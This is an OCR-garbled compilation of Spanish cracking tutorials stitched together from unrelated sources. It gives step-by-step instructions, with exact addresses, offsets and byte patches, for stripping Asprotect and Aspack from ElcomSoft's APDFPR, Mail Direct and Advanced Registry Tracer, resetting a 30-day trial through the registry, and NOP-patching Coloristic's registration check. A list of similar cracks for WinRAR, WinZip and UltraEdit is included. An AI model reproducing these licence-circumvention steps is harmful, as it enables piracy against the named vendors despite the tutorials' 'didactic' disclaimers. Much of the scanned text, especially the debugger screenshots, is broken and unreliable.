veremos que contiene esto: 


011D6714 EO BD A9 81 aY/ O» 


es decir que al revés es 819ABDEO, que para vosotros será distinto, pues bién es el resultado de GetCommandLineA, es decir 
en Revirgin debereis de solucionar esta entrada con: 


Module: Kernel32.dll Name: GetCommandLineA Address: BFF8C5DA (para hallar esta dir en SICE podeis hacer u 
GetCommanoLineaA) 


Damos a Resolve Again y entrada 2 resuelta. 
Entrada 3: 
| gual Crtl+G en la ventana de código a 4F1404, luego Crtl+R y os vais a la instrucción del ] mp que es: 


004C8E98 FF25 04144F00 ] MP DWORD PTR DS:[4F1404] 


pulsamos Enter aquí y estamos en el código de la entrada: 


011CE930 E8 9367FFFF CALL 011C50C8 
011CE935 A1 10671D01 MOV EAX, DWORD PTR DS:[11D6710] 
011CE93A C3 RETN 


No hace falta ni poner un break point, el call va a GetVersion, pero después carga EAX con el valor (ya sabeis como hallarlo): 


011D6710 D1 90 FC FF Ñeúy, que es FFFC90D1, pues bién lo hew comentado otras veces, cuando veais que EAX tiene un 
valor así que no nos dice nada, es que es una entrada falsa, la experiencia ya me lo hace hacer así, supongo que hasta que 
cambie Asproect. 


Entonces en el hexadecimal del archivo volcado deberemos de ir al offset C8E98 y sustituir los bytes del jmp por un retn que 
es C3 y luego nopear hasta ajustar la memoria, o sea quedaría como C39090909090. 


Ya está reseulto. 

Entrada 4: 

Crtl+G a 4F144C, luego Crtl+R y llegamos a : 

004C8F04 FF25 4C144F00 J MP DWORD PTR DS:[4F144C] 
pulsamos Enter aquí y tenemos: 


011CE8DC 55 PUSH EBP 

011CE8DD 8BEC MOV EBP,ESP 

011CE8DF 8B45 08 MOV EAX, DWORD PTR SS:[EBP+8] 
011CE8E2 85C0 TEST EAX,EAX 

011CE8E4 75 07 ] NZ SHORT 011CE8ED 

011CE8E6 Al 24661D01 MOV EAX, DWORD PTR DS:[11D6624] 
011CE8EB EB 06 ] MP SHORT 011CE8F3 

011CE8ED 50 PUSH EAX 

011CE8EE E8 BD67FFFF CALL 011C50B0 

011CE8F3 5D POP EBP 

011CE8F4 C2 0400 RETN 4 


Nos metemos en el call y resulta ser que es GetModuleHandleA, esta entrada si es verdadera, la experiencia ya me lo dice, de 
todas formas siempre comprobar a nopear el call, o la entrada completa en el salto con el RETN o RETN4 del final del código. 


Vamos a Revirgin, y para esta entrada ponemos: 

Module: Kernel32.dll Name: GetModuleHandleA Address: BFF77716 
Damos Resolve Agsin para fijar ya este cambio, y entrada 4 resuelta. 
Entrada 5: 

Crtl+G en 4F145C y Crtl+R y vemos: 

004C8F1C FF25 5C144F00 ] MP DWORD PTR DS:[4F145C] 

Damos Enter, y vemos: 


011CE48C 55 PUSH EBP 

011CE48D 8BEC MOV EBP,ESP 

011CE48F 8B55 0C MOV EDX, DWORD PTR SS:[EBP+C] 

011CE492 8B45 08 MOV EAX, DWORD PTR SS:[EBP+8] 

011CE495 8B0D B8541D01 MOV ECX, DWORD PTR DS:[11D54B8] 
011CE49B 8B09 MOV ECX, DWORD PTR DS:[ECX] 

011CE49D 3BC8 CMP ECX, EAX 

011CE49F 75 09 J]NZ SHORT 011CE4AA 

011CE4A1 8B0495 14531D01 MOV EAX,DWORD PTR DS:[EDX*4+11D5314] 


011CE4A8 EB 07 ] MP SHORT 011CE4B1 
011CE4AA 52 PUSH EDX 

011CE4AB 50 PUSH EAX 

011CE4AC E8 O76CFFFF CALL 011C50B8 
011CE4B1 5D POP EBP 

011CE4B2 C2 0800 RETN 8 


Lo mismo la experiencia me dice que es correcta, podeis probar lo de la anterior, que así es como se debiese de hacer para 
saberlo. 


El call llama a GetProcAddress, así que al Revirgin con: 

Module: Kernel32.dll Name: GetProcAddress, Address: BFF76DAS8. 
Resolve Again y ya está. 

Entrada 6: 

Crtl+G en 4F1494 y luego Crtl+R, veremos esto: 

004C8F70 FF25 94144F00 ] MP DWORD PTR DS:[4F1494] 

Enter aquí y el código es: 


011CE8F8 6A 00 PUSH O 

O11CE8FA E8 B167FFFF CALL 011C50B0 

O11CE8FF FF35 04671D01 PUSH DWORD PTR DS:[11D6704] 
011CE905 58 POP EAX 

011CE906 C3 RETN 


Sucede lo mismo que con la entrada 2, pero si hacemos un Follow in Dump, memory address en el push, nos damos cuenta 
que vale; 


011D6704 04 OA 00 CO ..A, es decir CODOOAO4, que es el resultado de GetVerion. 
Y más Revirgin, para esta entrada necesitamos: 

Module: Kernel32.dll Name: GetVersion Address: BFF92F1B 

Resolve Again. 

Entrada 7: 

Crtl+G 4f1504 y Crtl+R: 

004C9018 FF25 04154F00 J] MP DWORD PTR DS:[4F1504], Enter: 


011CE94C 55 PUSH EBP 

011CE94D 8BEC MOV EBP,ESP 

O11CE94F E8 2467FFFF CALL 011C5078 

011CE954 8B45 08 MOV EAX, DWORD PTR SS:[EBP+8] 
011CE957 5D POP EBP 

011CE958 C2 0400 RETN 4 


Bién como siempre la experiencia, pero comprobar a nopear el call o el salto hasta aquí con un Retn4, esta llamada es falsa, 
así que en el hexadecimal del archivo volcado deberemos ir al offset c9018 y sustituir el salto por un retn 4, es decir sustituir 
ff2504154f00 por c20400909090. 


Bién si no nos dimos cuenta en Show Unresolved, en principio no pasaría nada, el programa ya se ejecuta con las funciones 
falsas parcheadas en el volcado y las resoluciones perfectamente, sólo que el botón de la llavecita que sirve para registramos 
no funciona, y da un error precisamente en la dirección de la entrada 8, claro porque no lo hemos resuelto. 


En principio lo que podemos resolver en revirgin debería quedar así: 


Module [Ordinal [Name |Addess  [lATRva  |[Refsí= 


00000 OTC ODOFI3FO 00 
Kkemel32.dll 00000000 GetCommandLi bfí8cda5 ODOFI3FC 00 
0000000 OTCES3O O0OF1404 00 


kemel32.dl_ (00000000 _ GetModuletan bff77716  O00F144C_ 00 
kemel32.dl_ 00000000 GetProcáddres bif76da8  OOOFI45C 00 


kemel32.dl— ¡DOOO0000  GetVersion  bfSZfib  DDOFI494 00 


011CE94C (000F1504 00 


Entrada 8 y ufff que entrada, lo nunca visto hasta ahora: 


Bién hasta aquí seguimos despiertos no, porque buena falta va a hacer. No se como lo habrán hecho los chicos de ElCom 
creadores de este fantástico programa, o Alexey Sholovnikov creador de Asprotect, pero esta entrada llama a todo un 
recurso, es decir que no es una simple entrada verdadera o falsa y ya está. Repito que el programa funcionaría 
perfectamente salvo el botón de la llave para registrarnos que ya es bastante logro (a mi ahora porque tengo experiencia 
pero este programa me ha costado lo mio, de hecho por el empecé jejejeje) 


Hagamos Crtl+G a 4F1D68 y luego Crtl+R: 
004C94E0 FF25 681D4F00 ] MP DWORD PTR DS:[4F1D68] 
Damos a Enter en la instrucción y atención veremos esto: 


011CE97C 55 PUSH EBP 

011CE97D 8BEC MOV EBP,ESP 

O11CE97F 53 PUSH EBX 

011CE980 8B5D 08 MOV EBX, DWORD PTR SS:[EBP+8] 
011CE983 8B45 18 MOV EAX,DWORD PTR SS:[EBP+18] 
011CE986 50 PUSH EAX 

011CE987 8B45 14 MOV EAX, DWORD PTR SS:[EBP+14] 
011CE98A 50 PUSH EAX 

011CE98B 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10] 
011CE98E 50 PUSH EAX 

O11CE98F 6A 05 PUSH 5 

011CE991 8B45 OC MOV EAX,DWORD PTR SS:[EBP+C] 
011CE994 50 PUSH EAX 

011CE995 53 PUSH EBX 

011CE996 E8 C566FFFF CALL 011C5060 

011CE99B 50 PUSH EAX 

011CE99C 53 PUSH EBX 

011CE99D E8 3E67FFFF CALL 011C50E0 

O11CE9A2 50 PUSH EAX 

O11CE9A3 E8 4067FFFF CALL 011C50E8 

011CE9A8 50 PUSH EAX 

O11CE9A9 53 PUSH EBX 

O11CE9AA E8 5967FFFF CALL 011C5108 

O11CE9AF 5B POP EBX 

011CE9B0 5D POP EBP 

011CE9B1 C2 1400 RETN 14 


Impresionante no? hay 4 llamadas a APIS, ufff ufff un cafecito? jejeje 


Tenemos que la call 011C5060 si pulsamos Enter ahí 2 veces nos lleva a 


86EB2CC8 68 2A0AF8BF PUSH KERNEL32.FindResourceA 

La call 011C50E0 a 86EB2BD8 68 220BF8BF PUSH KERNEL32.LoadResource 

Call 011C50E8 a 86EB2BC8 68 482FF9BF PUSH KERNEL32.LockResource, y por último: 
call 011C5108 a 86EB2DA8 68 5112C0BF PUSH USER32.DialogBoxIndirectParamA 


Aquí he probado de todo, desde nopear cada call, una a una, hasta en el jmp poner un retn 14, nada, el botón llave no 
funcionaba, lo único que no he probado es a hacer combinaciones de nops con los call, aunque creo q es inutil, ya que si 
nopeas uno y falla, me imagino que nopeando 2 fallará más. 


Mi única solución fue Topo, así que lo abrí con mi archivo volcado, ya reparadas las entradas y parcheadas las entradas falsas 
y tenemos: 


t* ToPo v1.2 by MrCrimson?¿[WkT!12000] 


— Select file... 


Dpen [CWINDOWS'Escritoriorproyectostapdipriapd 


Bytes to be added: ; Scan  [W Backup file 


po. 7 (e All sections FT Redirect Entrypoint 
O Exec only TF Make code writable 


Result: Dot | 
Help ¿About 
Exit 


Select mode 


“You can add up to 53237 bytes inside an existing section 
without changing file size. 


Choose what you want me to do: 


C Use an existing section (file size unchanged)] 


Le decimos aque queremos una nueva sección, luego en bytes to be added debemos darle los bytes de la entrada. 


Bueno contamos todos los bytes de esta entrada desde el comienzo hasta el retn14 incluido y son unos 56 bytes, así que en 
topo, en Bytes to be added se lo indicamos el 56, que lo pide en decimal, pulsamos sobre Do it! y saldrá algo como esto: 


t* ToPo v1.2 by MiCrimson?[WkT!12000] 


— Select file... 


[Select a file... 


Bytes to be added: ¡; Scan; JW Backup file 


ES (* All sections F Redirect Entrypoint 


O Exec only FT” Make code writable 


Result 
56 bytes added at: [A 
-memory address: DOS3B000h Help About — 


+file offset: 00134, Cc00h 


Es decir que ha creado una nueva sección de 56 bytes a partir de 53B000 rellenada con 90 que en el hexadaecimal se ven 
clarisimos en el offset que indicó Topo, bién bién, vamos a extraerlos para que nos sea más fácil y no hacerlo a pedales, ya 
se os ocurre como no?, si pues ese memory Dumper v1.0, en Star Code Location le poneis Ox11CE97C y en Bytes Count 0x38 
(en decimal 56), le podeis decir que el archivo para no liaros q lo vuelque a 11ce97c,hex. 


Así q tenemos el tramo y la sección, pues nos vamos al editor hexadecimal y cargamos nuestro archivo volcado de apdfpr, y 
en el offset que indicó Topo es decir haciendo Crtl+G 13AC00 veremos los 56 nops que metió, así que ahora los 
seleccionamos todos, abrimos nuestro 11ce97c.hex, seleccionamos también todos estos, los copiamos y los reemplazamos en 
nuestro volcado del apdfpr donde los teníamos seleccionados. 


Ah y se me olvidaba casi, la dirección a la que apunta 4F1D68 que es precisamente 11ce97c hay que cambiarla como es 
lógico por 53B000, así que haceis Crtl+G F1D68 y allí sustutuis 7ce91c01 por OOb05300 ok?. 


Ya está todo?, nooo, si ejecutais el programa que ya funcionaba y la llave, vereis que sigue sin funcionar, claro porque nos 
falta ajustar las calls para que apunten a las funciones concretas, así que para ver cómo se hace nos vamos a Olly y 
cargamos el volcado de apafpr, y hacemos Crtl+G 53B000, que es la dirección de nuestra sección, o también Crtl+G 4F1D68 
y Crtl+R + Enter: 


(3 CPU - main thread, module APDFPR_D A ES 


PUSH a E a fRegisters (FPU) 

Sd ERA 00491099 APDFPR_D.<Modu leEntryPoint> 
MOU EBX,DWORD PTR SS: [EBP+8] LAOS 

JU EBX, DWORD F : [EBP+8] S1ABC280 

O P 55: [EBP+18] ABE50BBA 

"US HA 

MOV EAX, DWORD PTR SS: CEBP+14] pct 

PUSH nom pTR a+ TERD+10 81ABC250 


MOV EAX, DWORD SS: [EBP+10] 
UE En 00000006 


PUSH_5 Ñ 00401000 APDFPR_D. <Modu leEntryPoint > 


HOU, EA, DWORD 991 [EBP+01 ES B16F 32bit BLFFFF) 
E ENS CS 6167 32bit OLFFFFFFFF) 
CALL APOFPR_D. OBSS16E4 SS B16F 32bit BLFFFF) 
dió > DS 016F 32bit OLFFFF) 

FS 627F 16bit SÍABAC20137) 
ABOFPR_D. 00 GS 6088 NULL 


DPCEPR - D.DBS3176C LastErr ERROR_SUCCESS (B0909000909) 
: E 0020086 (0,NB,NE,A,S,PE,GE,6) 


empty 1. 94038934882065977945 
empty B.7840608076644173252 
empty 1.1059713675450666420 
empty M.9216227070972138336 
enpt y 1681.0000000000900000 


Y Y ( 
A 
PCTIrriritrr 


DODA 
DL 
DO 


ABACAL 
4nB4CADB4 
46B4CAD4 
AnB4CAL 
BaB4C AC 


YB 00d 
om 


Dí 


OB7EFE7O| OB % 
an; SeFES 4 BFF7 B| KERNEL32. Debu: 


DOLALDOWO 
SONO DO 
POD: 


DO76FESS 


Antes de cualquier cambio, fijaos en los offsets de las call o mejor dicho anotaos dichos offsets y los bytes que hay, pora 
luego cambiarlos por los que vamos a meter a continuación. 


Si os fijasteis arriba cuando puse que era cada call teníamos la dir de la call pero al revés, es decir teníamos como direcciones 
estas: 


Find ResourceA---—=========-- BFF80A2A 
LoadResourceA-o==========-- BFF80B22 
LockResourceA-----=====--- BFF92F48 


DialogBoxl ndirectparamA-------- BFCO1251 

pues bién vamos Call a Call, nos ponemos encima y ensamblamos la instrucción: 
En la primera la Call 5316e4, deberemos poner call OxBFF80A2A 

Call 531764, deberemos ponerla como call OxBFF80B22 

Call 53176C, como Call OxBFF92F48, y por último la: 

Call 53178C como call OxBFCO1251 


Se pone como Ox porque sino no reconoce la dirección, y nos debería quedar como esto: 


CPU - main thread, module APDFPR_D 


55 PUSH_EBP 
8BEC MOU EBP,ESP 


leEnt 


; 40401006 APOFPR_D. <Modu 


53 PUSH EBX S1ABC270 
2850 08 MOU EBX, DWORD PTR SS: CEBP+8] =D S1ABCSBA 
8B45 18 MOU EAX, DWORD PTR SS: CEBP+18] ODES000a 
57 PUSH EAX BO7ÉFEZC 
:18B45 14 MOU EAX, DWORD PTR SS: CEBP+14] ERP BO76FF78 
50 PUSH EAX ESI S1ABC250 
OF 2B4S 10 MOU EAX, DWORD PTR SS: CEBP+10] 31 O00B6DDn 


PUSH EAX 
PUSH 


5 IP 60401000 
MOU EAX, DWORD PTR SS: [EBP+C] 
PUSH ERX 


APDFPR_D. <Modu leEnt 


2169 BS 
518B45 BC 
2158 


COE O(FFFF) 
A EBXx Pi CS OLFFFEFFFF) 
3/E8 BBSAA4BF KERNEL32.FindResourceA 2 0 Ds ELLOS 
3 Eb% S1 FS 627F 16bit SIABAC20(37 
ES FCSAR4EF KERNEL32. LoadResource Ll e APR NULL 
¡Es REA O d LastErr ERROR_SUCCESS (600E 


ES 1C7FASBF 
50 


53 
ES 1E626CBF 
5B 
5D 


KERNEL32. LockResource - > . 
EAX 00200486 (0,NB,NE,A,S,PE,GE, 


EBX e 
: : A empty 1. 94039934882065977945 
EAT POLI empty 0. 724060280766441723252 
' empty 1.1059713675450666420 

C2 1400 empty M.9216227070972138336 
o DTD 5714 empty 1681, 000000000000090 


AAA 


00 


Ja 
00 


DO76FE48 


La TT] 


Y ( 


1] b 4 B 15) . 

BbB2 só B : 9ue = a S 

C 76 80/40 66 an > Ñ ce j E 4 A > - 

3 4B 06/60 20 9 DOr6FESO| 6 re 

A 66 BB/S5C CA 4B , co 

E CC |4B 60 Bu Ñ 
Bt 5 = 
Y: : 


a 06 BO Fa 4B lap 6FE60 90000903 
AB4CAB4 BRA 7O aa . - 
A4B4CABS 27 4C 66/1566 BA A4 


0D 
E 


KERMEL32.DebugBreak 


y 
L 

0 
DADOADD 
DO de] 


Como tenemos los offsets, los bytes que se deben cambiar y por cuales se deben cambiar, mirar las dos imágenes, nos 
vamos al editor hexadecimal, le cargamos el programa volcado del apdfpr y lo cambiamos estos bytes en estos offsets, 
podeis usar una calculadora de offsets, ya que son direcciones como la de comienzo 13AC00. 


Bién espero que lo consiguieseis igual que yo y que os funcione el programa. Ha sido un placer. 


Confío en no equivocarme mucho, al menos lo he intentado, de todas maneras si conseguís una solución mejor que la mia 
por favor háganmelo saber, les estaría muy agradecido. 


CONSIDERACIONES FINALES 


Este ha sido el Asprotect más dificil que me he encontrado hasta la fecha, espero que aunque 
ahora resulte más o menos fácil a mi me ha costado mucho tiempo dar con la clave del 
problema. 


Quisiera agradecer como siempre a Ricardo Narvaja sus enseñanzas, porque es un verdadero 
maestro, a Auspex por ser el primero en resolver uno al menos en español, jeje y ser un buén 
amigo y como siempre atodos los chicos de Crackslatinos, Red_Hawk, FLIPI, D anielf, XY zero 
(algún día se resolverá todo jeje), Mr _G andlaf entre otros. 


Gracias atodos. Seguiremos en la lucha. 


DGrojo 
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INTRODUCCION 


Si estas buscando cracks o serials, aquí no los vas a encontrar. Todo lo que aquí se describe es 
puramente didactico, lo que el usuario final realice con dicha información sólo le acontece a él. 
Te recomiendo que si tienes la oportunidad adquieras el programa de forma legal, ya que de 
esta manera contribuyes a que el programa continue desarrollandose. 


El autor sólo pretende ensenyar los diferentes métodos de protección que tienen los programa, 
no abusando de dicha información 


Overview 


Mail Direct is a program that will allow you bypass your ISP's mail server and use your computer to 
send e-mails directly to recipients. The program can do this because it has a built-in SMTP server 
which you can use instead of your ISP's mail server. All you have to do is set up your e-mail client to 
use "localhost" as your outgoing mail server and run Mail Direct. The program will then deliver any e- 
mail that you send out through it, and it will terminate delivery of messages that you have sent out to 
wrong or bad e-mail addresses. 


AL ATAKE 


Protecciones. 


1. Enpaquetado con aspack 
2. Número de Serie 


Enpaquetado. 


Nos encontramos ante un programa empaquetado y esto lo podremos deducir por diferentes razones. La mas sencilla es 
de sentido común, si el programa no está hecho en VB o ASM el programa debe ocupar más de 700 KB cuando realmente 
está ocupando 312 KB. Si cogemos el W32DASM y lo desensamblamos veremos como se nos queda colgado, esta es otra 
pista que nos indica que estamos ante un empaquetado y por ultimo, ejecutamo el PE-Editor y vemos cuantas secciones 
tiene, hay una que nos dice que se llama .aspack, bueno más no nos puede decir. 


Para descomprimirlo tenemos dos opciones, la primera es utilizar en unpacker correspondiente a su versión (sabes que 
version es?), para ello utilizaremos el Un-PACK para que nos diga de que se trata realmente 


Como la todo no es tan fácil, hay que descomprimirlo a mano. Para ello utilizaremos el PE-Editor, y le cambiaremos la 
sección del .aspack por algo ejecutable, es decir de COOO0040 a E0000020 (ver tutoriales de PE para mayor información), 
con lo que conseguimos que el W32DASM no se cuelgue, y de paso podemos ver como comienza el empaquetado: 


60 PUSHAD 
E93D040000 JMP 004F8444 
D557 AAD (BASE=87) 


Estas primera lineas son típicas de programas empaquetados, ahora lo que debemos buscar es una sección que diga algo 
por este estilo: 


POPAD 
PUSH xxxxxx 
RET 


Donde las xxxxxx será la verdadera entrada de programa una vez desempaquetado. Pululad vosotros mismos hasta 
encontrar estas sentencias, una vez que sabemos el valor de xxxxxx = 4A5CBC, hacemos un pequenyo truco, 
modificamos la sentencia del Softlce para que el RET sea un JMP a si mismo, de esta forma dejamos el programa 
enbuclado hasta que nosotros queramos, utilizad las sentencias: 


a 
jmp eip 


Y dejamos que el programa se ejecute con un go. Seguidamente ejecutamos el PROCDump y buscamos la tarea del Mail 
Direct, para hacerle un FullDump, de esta forma conseguirems obtener todo el programa descomprimido. Pero aun no 
hemos acabado, ya que hemos de editar las sección, primero hay que indicarle cual será el nuevo EOP (Entry Of 
Program) y este lo obtendemos restando 4A5CBC - 400000 = ASCBC. Seguidamente indicaremos en las secciones, que 
la CODE es ejecutable y será un E0000020 en vez de un CO000040. 


Si todo lo hemos hecho correctamente, ejecutando el programa del FullDump deberá funcionar correctamente, en caso 
contrario algo hemos hecho mal. 


Bueno, ahora sólo queda restaurar el programa que tenemos en bucle infinito, devolver el ret que le hemos robado, 
simplemente activando el debugger. 


30 Day Trial 


El programa nos grita que sólo lo podemos probar durante 30 dias, pero como casi siempre, un programa no se puede 
probrar en tan poco tiempo, por ello es necesario hacer que su vida sea más larga. 


Como estamos hablando de días, lo lógico es pensar que capture la fecha del sistema y la compara con alguna otra fecha 


que tenga grabada en otro lado. Normalmente ese otro lado es el basuro de registros del windoze. Probamos suerte 
activando el REGMonitor y filtramos por el nombre del ejecutable a ver que es lo que sale. 


Nos salen registros standard de windoze, luego nos sale registros del HKCU, con directorio en 
Software/OCloud/MailDirect esto tiene toda la pinta de ser donde guarda toda la configuración y posiblemente donde 
guarda la fecha. Pero el REGMonitor nos depara otra sorpresa, si miramos más abajo, vemos que lee cierta información 
en HKCU con directorio en Software/CLASSES/CLSID/[*), donde el * es una serie de caracteres, esto es muy sopechoso. 
Vamos a ver que pasa si adelantamos el reloj y monitorizamos ese registro. 


Al adelantar el reloj, a la entrada no le pasa nada, entonces lo siguiente que se me ocurre es borrar esta entrada y volver a 
ejecutar el reloj. Efectivamente, al borrar dicha entrada el programa vuelve a estar en día de instalación 1. 


También podemos utilizar el Soft-Ice para detectar la comparación de la fecha, para ello vamos a utilizar un bpx 
GetLocalTime y vamos a ver que es lo que pasa. Activamos el break-point y nos para en CS:4094C4D, si queremos 
podemos observar que es lo que pasa, pero siguiendo la lógica esto debe de estar metido dentro de una subrutina por lo 
tanto vamos a pular F12 (p ret) para ver donde nos lleva: CS:4A567C. 


8D8560FFFFFF 
ESCT0AFEFF 
FF75EC 
FF75E8 
ESC445F6FF 
83C4FPad X!d 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


' NuMega SoftlCE Symbol Loader - [No Module Opened] fol x 
File Edit Module Tools View Help 


dE A A ls 


SoftICE is not active. Symbols cannot be loaded. 


a 


For Help. press Fl SoftlCE is not active l 


E URSoft W32Dasm Yer 8.93 Program Disassembler¿D ebugger 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


| Select a File for Disassembly 


* NuMega SmartCheck 
File Edit View Program Window Help 


For Help, press Fl 
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rueleando deivanced Resin Tal 1. eliminar Asproted.2. Similar estar 
registrado. 


rackeando Coloristic 1.2 1. Similar estar registrado. 


rackeando Drive Doppler 1.20 Release Name / Serial, Limitacion de Tiempo. Descripcion: 
andidate +2! ¡Comprueba que carpetas incrementan de tamaño 


rackeando Java Script It! v1.3 Programa para hacer applets java facilmente. Tipo Serial 
rackeando MemTurbo V1.5 Libera de memoria RAM tipo serial 


rackeando Qu ick Heal ID escripcion: Excelente virus scanner Dificultad: Principiante 
Objetivo: Simular estar registrado 
Editor Hexadecimal El faborito de los crackers . 
rackeando UltraEdit 32 8 : 
Simular el registro 


rackeando Winrar 2.04 ompresor de archivos . Simular el registro 
rackeando Wolfsnap-es Parchar programa 


más 10 Maia 2 Objetivos: 1. Generar un Numero de Serie 2. 
Codificación del Keygen. 

rackeando WinRAR 3.00 en español ompresor de archivos . Simular el registro 

rackeando Winzip 8.1 ompresor de archivos . Simular el registro 


Titulo: 


Crackeando Coloristic 1.2 
Url del Programa: <http://www.bubblepop.com> 


|[Autor: Algarete 
|E-Mail: jry4k 4ehotmail.com 


|Nivel: Facil(x) Medio() Dificil () 


Utilidades: W32Dasm 8.9 y WinHex (o el de tu preferencia) 


Manos a la obra!. 


Primero que nada hay que investigar que tipo 


de proteccion lleva el programita este, 


lo abrimos ohh 


y que vemos no se si a ustedes pero a mi me salio un Reminder 
olvidemonos del nag y vamos a 


o un nag como lo quieran llamar , 
Help->Register... 
poner el nombre y serial. 
en mi caso "Algarete" y serial 
un click a Register y shit "You have entered an invalid..... M 


"12345" 


y como siempre no sale la tipica ventanita de 
oka! pongan cualquier nombre en el name 
(usa el que quieras) 


damos 
oOkA 


Ahora abrimos el W32Dasm y abrimos el Coloristic 1.2 damos click 
en String References y buscamos y no muy distante vemos nuestro 


mensaje de Error, 
Registering your copy... 


nos gusta 


* Possible Reference to String Resource ID=00500: 


y Caemos aqui: 


ohh pero que veo, 


registering your copy of Coloristic and showin" 


:00403C28 


68F4010000 


Caemos aqui! 


:00403C2D 
:00403C30 
:00403C31 
:00403C36 
:00403C37 
:00403C38 
:00403C3B 
:00403C3C 
:00403C3F 
:00403C42 
:00403C43 
:00403C48 
:00403C49 
:00403C4A 


oka, pero 
vemos: 


:00403C0C 
:00403C0F 
:00403C10 
:00403C13 
:00403C14 
:00403C17 
:00403C1C 
:00403C1F 


8D45F0 

50 
E80AE8FFEFF 
59 

59 

8D45F0 

50 

8B459C 
8B4004 

50 
E8B8E4FFEFF 
59 

59 

8D4DFO 


aqui no veo nada cool, 


8D45E4 
50 
8D45DC 

50 

8B4D9C 
E8E41C0000 
8B459C 
83B8D800000000 


push 000001F4 


lea eax, dword 
push eax 

call 00402440 
pop ecx 

pop ecx 

lea eax, dword 
push eax 

mov eax, dword 
mov eax, dword 
push eax 

call 00402100 
pop ecx 

pop ecx 

lea ecx, dword 


asi que subimos 


lea eax, dword 
push eax 

lea eax, dword 
push eax 

mov ecx, dword 
call 00405900 
mov eax, dword 


tambien veo esto "Thank you for 
." damos click a ese mensaje que es el que 


"Thank you for 


[ebp-10] 


ptr [ebp-64] 


[eax+04] 


ptr [ebp-10] 


un poquito a ver que 


ptr [ebp-1C] 


ptr [ebp-24] 
ptr [ebp-64] 


ptr [ebp-64] 


cmp dword ptr [eax+000000D8], 


00000000 <-- interesante 
:00403C26 7448 je 00403C70 <<-- Super 
interesante, que tal si nopeamos este salto? 


* Possible Ref to Menu: MenulD_0064, Item: "About Coloristic" 


* Possible Reference to String Resource ID=00500: "Thank you for 
registering your copy of Coloristic and showin" 


:00403C28 68F4010000 push 000001F4 

:00403C2D 8D45FO lea eax, dword ptr [ebp-101 
:00403C30 50 push eax 

:00403C31 E80AE8FFEFF call 00402440 


en el w32Dasm marcamos la direccion ":00403C26 7448 

je 00403C70" 

y miramos el offset vemos que es (00003026h) apuntamos la direccion en 
el WinHex 

(Position -> Go to Offset) 3026 y Caemos en 7448 lo nopeamos osea 
enves de 7448 

escribimos 9090 y listo , abrimos el prog. escribes tu nombre cualquier 
serial 

y Crackeado!! ¡) Facil no crees? 
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Advanced Registry Traced 1.60 
519 Kb 


http://www.elcomsoft.co 
ninos l. eliminar Asproted. 
OnJenoS 2. Similar estar registrado. 
, ] l. PEiD, OllyDbg, Memory Dumper, Revirgin, Hex 
Work Shop, PEditor, 


Dificultad: Media ....:)D 


| Introducción | 


Tengo que agradecer la incontable ayuda de Auspex, DG Rojo, y 
Ricardo Narvaja, por sus tutoriales, Gracias de verdad colegas. 


Comentario del Programa 


Este es un programa que nos puede ayudar mucho, con los 
programas, que caducan, pues casi todos guardan, la fecha en el 
registro, la teoría es la siguiente, hacemos una foto, del registro, 


adelantamos la fecha un día, hacemos otra foto, las comparamos y 
vemos lo que se ha modificado, hay esta la fecha, sabiendo esto 
podemos “Jugar con este dato a nuestro antojo”. (Ver lecciones 
Curso viejo ricardo) 


Lección 19 Registry Compare 1.22 
LeceLon 32 Softcopier 3.4.2.4 
Lección 30 Flash Fxp 


Lección, 37 Simstate lu 
Lección 58 Scitech Gldirect Versión 2 
Lección 59 Mcafee Sofware 


También salta la protección de Asprtoted , ( 30 días), sin dificultad, por 
lo que es una herramienta muy útil, para nosotros 


ADVERTENCIA : El texto de este artículo esta escrito con fines 
didácticos, para mostrar simplemente como funciona el sistema, por el 
cual queda anotado todo lo que compramos. El autor no se hace 
responsable de cualquier uso ilegal que se le den a estos conocimientos. 


Manos a la Obra 


Volcado del EXE 


El volcado del exe, por que hacerlo? bueno, ese es el objetivo, hacer 
que el programa corra desempacado, y así poder utilizar nuestro 
programa desensamblado, bueno, el volcado del exe, se hace 
directamente de la memoria, por qué? bueno, porque es el único 


momento en el que el archivo se encuentra desempacado. 


Lo primero es ejecutar PEiD, abrir el ejecutable (art.exe), ir a menú, y 
seleccionar OEP Module para obtener la siguiente información: 


'' PEiDentifier v0.8 


Open File | CAmMAGORegristrol Art. exe 


Entre Point : 10006 


File OFFset : 
Linker Version : 
Information : 


AsProtect 1.2x [Me 


| Stay-Sn-Top 


Como puede observarse, está empaquetado con una versión bastante 
reciente de Asprotect (1.2x) (al menos a la fecha en la cual escribo 
estas líneas), y además el OEP (Original Entry Poinyt) = 4DDD54. 
Nunca hay que confiarse de esta información, pero en este caso es 
real. 


Ahora se necesitan calcular otros datos necesarios para realizar el 
dumpeado. Estos datos son: Image Base y Size of Image, los cuales se 
pueden obtener con PEditor: Como se observa, estos datos son 
400000 y 172000 respectivamente. 


File Info 


Entry Point: 100001 o00 
Image Base: 100400000 


Optional Header 


Baze of Code: [00001 000 
Baze of Data: [000DEO0O 
Size of Image: 1001 ¿2000 


Existen otras formas de verificar el OEP. Una de ellas es el método de 
Ricardo Narvaja, el cual consiste en cargar la aplicación en OllyDbg, 
ejecutarla (F9), continuar la ejecución alterando entre Shift+F7 y FO 
cuando se producen las excepciones. Cuando se llega a ejecutar por 
completo hay que observar cual fue la última excepción, realizar todo 
nuevamente, pero cuando se alcanza esta última con Shift+F7, en 
lugar de apretar F9, hay que presionar Alt+M para acceder a la 
pantalla de memoria, poner un breakpoint en la sección de código 
(code), presionar Alt+C para volver a la pantalla de CPU, y ahora si 
presionar F9. De esta forma el programa quedará detenido justo en el 
OEP, 


Memo y map 


PE header 
code. Tian 


=] LRME- 


Actualiza 
E Yiewcin Disassembler Enter 
: Cump in CPU 
de Curnp 
3DE| 54 PUSH ESP Search Ctrl+B 
3DC|. ES 43000000 7 
Ei] C2 BS | 
dE4| 55 as EEF Set break-on-access FZ 
JES|  8BEC EEP, ESP 
JEF|  ES3EC 56 SUB ESP, 56 5 - 
JEA|. 894424 BC MOL DWORD PTR SS: J Set memory breakpoint on access 
JEE| 64:A1 156000680! MOL EAX, DWORD PTR FS: [1 e 
a A AO ENS SONES cion, pre 
AFH : A) 7 
3FD| 074424 64 66086 MOU DIORD PTR ss: TEsp+4 Remove memory breakpoint 
105|  Cr4424 Bs 08801 NOU DWORD PTR SS:LESP+S — cararress » 
